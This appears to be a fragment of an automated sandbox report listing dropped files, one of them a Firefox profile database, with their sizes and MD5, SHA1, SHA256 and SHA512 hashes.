MD5d136a34614e538a8dde28c50bb53324c
SHA12d8085be94539b142eb1044b8c74637061f6db8e
SHA2566bc17b715568cab8a5cca78fd83c05092671538750568f12dd241396df73212d
SHA5121ab2970fa9f39f9602b572455f3c4de11c2b894038b284a85bc831f431f088cf57e390362dcb8325f4f30d6df71363da50412e560fcf526bb59243c19330c93a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hnpwu3id.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.5MB
MD5403193b4b6d9366cfc0cb1ae41b22840
SHA174892dd4fb7124c3eb88c61b963f5c75b0a728a8
SHA256be531e387eacede3701f1450c50b7c3a90f135bf776827e4581884e5980638fd
SHA512c38e1c1b0bef78b195355d44ad9dd52f499b75ce801ec792848566914cc0493045893de03d915ab9bd48d61ad2490d30a0af08f53419162c94b5cc6528c30e7f
-
Filesize
368KB
MD5990442d764ff1262c0b7be1e3088b6d3
SHA10b161374074ef2acc101ed23204da00a0acaa86e
SHA2566c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4
SHA512af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4
-
Filesize
355KB
MD59cfe1ced0752035a26677843c0cbb4e3
SHA1e8833ac499b41beb6763a684ba60333cdf955918
SHA2563bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634
SHA51229e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f
-
Filesize
260KB
MD566522d67917b7994ddfb5647f1c3472e
SHA1f341b9b28ca7ac21740d4a7d20e4477dba451139
SHA2565da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1
SHA512921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968